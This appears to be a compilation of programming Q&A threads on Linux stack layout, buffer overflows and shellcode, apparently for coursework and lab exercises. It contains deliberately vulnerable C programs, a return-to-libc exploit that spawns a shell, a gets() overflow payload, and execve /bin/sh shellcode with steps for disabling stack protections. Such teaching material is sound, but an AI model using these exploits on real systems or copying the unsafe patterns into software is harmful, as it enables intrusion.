Understanding stack in linux - c

I have a small (and vulnerable) C sample:
#include <unistd.h>
int main(int argc, char *argv[])
{
char buff[100];
if(argc < 2)
{
printf("Syntax: %s <input string>\n", argv[0]);
exit (0);
}
strcpy(buff, argv[1]);
return 0;
}
I compiled it with:
gcc -o basic_overflow basic_overflow.c -fno-stack-protector -fno-builtin
When I open this program with gdb, disassembly looks like this:
Dump of assembler code for function main:
0x08048424 <+0>: push ebp
0x08048425 <+1>: mov ebp,esp
0x08048427 <+3>: and esp,0xfffffff0
0x0804842a <+6>: add esp,0xffffff80
...
Setting a breakpoint in main (after the prologue). Since we have a local buffer I would expect my stackframe to be 100 bytes in size. However when I do $ebp-$esp, I can see that the result is actually 136.
Plattform: Linux user-VirtualBox 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:50 UTC 2011 i686 i686 i386 GNU/Linux
Compiler: gcc (Ubuntu/Linaro 4.5.2-8ubuntu4) 4.5.2
Debugger: GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
What did I get wrong?

It's not just the size of the local variables - generally speaking there is the padding to the size specified by the platform ABI, clobbered registers, alloca() area... - check for example this nice picture

The buffer address is so hard to get. I also have this question. There is a good article teaching you how to smash the stack.
But in my computer,ubuntu 12.04 ,gcc 4.6 or 4.4.7,I have test the latest eggshell.c,and the result is core dump.
He puts the shellcode in environment vars.But It's had to find the environment vars address.I also find smash the stack sometimes doesn't have effect.Any one can help make it run??

Related

Return to libc buffer overflow attack

I tried to make a return to libc buffer overflow. I found all the addresses for system, exit and /bin/sh, I don't know why, but when I try to run the vulnerable program nothing happens.
system, exit address
/bin/sh address
Vulnerable program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find MYSHELL address(for /bin/sh)
#include <stdio.h>
void main()
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Terminal:
Terminal image after run retlib
First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:
ASLR: You have already disabled with sudo sysctl -w kernel.randomize_va_space=0. But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash.
Stack protector: The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then just before returning, verify that it has not been changed by the buffer write operation. This can be disabled with -fno-stack-protector.
Shadow stack: Newer processors might have a shadow stack feature (Intel CET) that when calling a function, stashes a copy of the return address away from the writable memory, which is checked against the return address when returning from the current function. This (and some other CET protections) can disabled with -fcf-protection=none.
The question does not mention it, but the addresses used in the code (along with use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from shell are identical (at least in length). If one is executed as a.out, the other should also be executed as a.out. One being in a different path, having a different argv will move the environment variable.
Alternatively, you can print the address of the environment variable from within the vulnerable binary.
By looking at the disassembly of bof function, the distance between the buffer and the return address can be determined:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread#plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is used as the first parameter to fread, which is the buffer that will be overflowed. Also note that ebp was the value of esp just after pushing ebp in the first instruction. So, ebp points to the saved ebp, which is followed by the return address. That means from the start of the buffer, saved ebp is 20 bytes away, and return address is 24 bytes away.
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!

Difference between running an assembly program and running the disassembled code in shellcode.c

I am currently working on 'Pentester Academy's x86_64 Assembly Language and Shellcoding on Linux' course (www.pentesteracademy.com/course?id=7). I have one simple question that I can't quite figure out: what is the exact difference between running an assembly program that has been assembled and linked with NASM and ld vs. running the same disassembled program in the classic shellcode.c program (written below). Why use one method over the other?
As an example, when following the first method, I use the commands :
nasm -f elf64 -o execve_stack.o execve_stack.asm
ld -o execve_stack execve_stack.o
./execve_stack
When using the second method, I insert the disassembled shellcode in the shellcode.c program:
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";
int main(void) {
printf("Shellcode length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}
... and use the commands:
gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
./shellcode
I have analyzed both programs in GDB and found that addresses stored in certain registers differ. I have also read the answer to the following question (C code explanation), which helped me understand the way the shellcode.c program works. Having said that, I still don't fully understand the exact way in which these two methods differ.
There is no theoretical difference between the two methods. In both you end up executing a bunch of assembly instructions on the processor.
The shellcode.c program is there to just demonstrate what would happen if you run the assembly defined as an array of bytes in the unsigned char code[] variable.
Why use one method over the other?
I think you don't understand the purpose of shellcodes and the reasoning behind the shellcode.c program (why it shows what happens when an arbitrary sequence of bytes you have control on is executed on the processor).
A shellcode is a small piece of assembly code that is used to exploit a software vulnerability. An attacker usually injects a shellcode into software by taking advantage of common programming errors such as buffer overflows and then tries to make the software execute that injected shellcode.
A good article showing a step-by-step tutorial on how to generate a shell by performing shellcode injection using buffer overflows can be found here.
Here is how a classic shellcode \x83\xec\x48\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 looks like in assembler:
sub esp, 72
xor eax, eax
xor edx, edx
push eax
push 0x68732f2f ; "hs//" (/ is doubled because you need to push 4 bytes on the stack)
push 0x6e69622f ; "nib/"
mov ebx, esp ; EBX = address of string "/bin//sh"
push eax
push ebx
mov ecx, esp
mov al, 0xb ; EAX = 11 (which is the ID of the sys_execve Linux system call)
int 0x80
In an x86 environment, this does an execve system call with the "/bin/sh" string as parameter.

Running linked C object files(compiled from C and x86-64 assembly) on Cygwin shell, no output?

Trying to deal with my assignment of Assembly Language...
There are two files, hello.c and world.asm, the professor ask us to compile the two file using gcc and nasm and link the object code together.
I can do it under 64 bit ubuntu 12.10 well, with native gcc and nasm.
But when I try same thing on 64 bit Win8 via cygwin 1.7 (first I try to use gcc but somehow the -m64 option doesn't work, and since the professor ask us to generate the code in 64-bit, I googled and found a package called mingw-w64 which has a compiler x86_64-w64-mingw32-gcc that I can use -m64 with), I can get the files compiled to mainhello.o and world.o and link them to a main.out file, but somehow when I type " ./main.out" and wait for the "Hello world", nothing happens, no output no error message.
New user thus can't post image, sorry about that, here is the screenshot of what happens in the Cygwin shell:
I'm just a newbie to everything, I know I can do the assignment under ubuntu, but I'm just being curious about what's going on here?
Thank you guys
hello.c
//Purpose: Demonstrate outputting integer data using the format specifiers of C.
//
//Compile this source file: gcc -c -Wall -m64 -o mainhello.o hello.c
//Link this object file with all other object files:
//gcc -m64 -o main.out mainhello.o world.o
//Execute in 64-bit protected mode: ./main.out
//
#include <stdio.h>
#include <stdint.h> //For C99 compatability
extern unsigned long int sayhello();
int main(int argc, char* argv[])
{unsigned long int result = -999;
printf("%s\n\n","The main C program will now call the X86-64 subprogram.");
result = sayhello();
printf("%s\n","The subprogram has returned control to main.");
printf("%s%lu\n","The return code is ",result);
printf("%s\n","Bye");
return result;
}
world.asm
;Purpose: Output the famous Hello World message.
;Assemble: nasm -f elf64 -l world.lis -o world.o world.asm
;===== Begin code area
extern printf ;This function will be linked into the executable by the linker
global sayhello
segment .data ;Place initialized data in this segment
welcome db "Hello World", 10, 0
specifierforstringdata db "%s", 10,
segment .bss
segment .text
sayhello:
;Output the famous message
mov qword rax, 0
mov rdi, specifierforstringdata
mov rsi, welcome
call printf
;Prepare to exit from this function
mov qword rax, 0
ret;
;===== End of function sayhello
;Purpose: Output the famous Hello World message.
;Assemble: nasm -f win64 -o world.o world.asm
;===== Begin code area
extern _printf ;This function will be linked into the executable by the linker
global _sayhello
segment .data ;Place initialized data in this segment
welcome db "Hello World", 0
specifierforstringdata db "%s", 10, 0
segment .text
_sayhello:
;Output the famous message
sub rsp, 40 ; shadow space and stack alignment
mov rcx, specifierforstringdata
mov rdx, welcome
call _printf
add rsp, 40 ; clean up stack
;Prepare to exit from this function
mov qword rax, 0
ret
;===== End of function sayhello
When linked together with the C wrapper in the question and run in plain cmd window it works fine:
Depending on your toolchain you might need to remove the leading underscores from symbols.

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
void main()
{
int *ret;
ret = (int *)&ret + 2; // +2 to get to the return address on the stack
(*ret) = (int)shellcode;
}
Execution result in Segmentation error.
[user1#fedo BOF]$ gcc -o ExitShellCode ExitShellCode.c
[user1#fedo BOF]$ ./ExitShellCode
Segmentation fault (core dumped)
This is the Objdump of the shellcode.a
[user1#fedo BOF]$ objdump -d exitShellcodeaAss
exitShellcodeaAss: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: bb 14 00 00 00 mov $0x14,%ebx
8048059: b8 01 00 00 00 mov $0x1,%eax
804805e: cd 80 int $0x80
System I'm using
fedora Linux 3.1.2-1.fc16.i686
ASLR is disabled.
Debugging with GDB.
gcc version 4.6.2
mmm maybe it is to late to answer to this question, but they might be a passive syntax error. It seems like thet shellcode is malformed, I mean:
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
its not the same as:
char shellcode[]= "\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
although this fix won't help you solving this problem, but have you tried disabling some kernel protection mechanism like: NX bit, Stack Randomization, etc... ?
Based on two other questions, namely How to determine return address on stack? and C: return address of function (mac), i'm confident that you are not overwriting the correct address. This is basically caused due to your assumption, that the return address can be determined in the way you did it. But as the answer to thefirst question (1) states, this must not be the case.
Therefore:
Check if the address is really correct
Find a way for determining the correct return address, if you do not want to use the builtin GCC feature
You can also execute shellcode like in this scenario, by casting the buffer to a function like
(*(int(*)()) shellcode)();
If you want the shellcode be executed in the stack you must compile without NX (stack protector) and with correct permissions.
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
E.g.
#include <stdio.h>
#include <string.h>
const char code[] ="\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
printf("Length: %d bytes\n", strlen(code));
(*(void(*)()) code)();
return 0;
}
If you want to debug it with gdb:
[manu#debian /tmp]$ gdb ./shellcode
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
...
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) b *&code
Breakpoint 1 at 0x4005c4
(gdb) r
Starting program: /tmp/shellcode
Length: 2 bytes
Breakpoint 1, 0x00000000004005c4 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x00000000004005c4 <+0>: mov $0x14,%ebx
0x00000000004005c9 <+5>: mov $0x1,%eax
0x00000000004005ce <+10>: int $0x80
0x00000000004005d0 <+12>: add %cl,0x6e(%rbp,%riz,2)
End of assembler dump.
In this proof of concept example is not important the null bytes. But when you are developing shellcodes you should keep in mind and remove the bad characters.
Shellcode cannot have Zeros on it. Remove the null characters.

Resources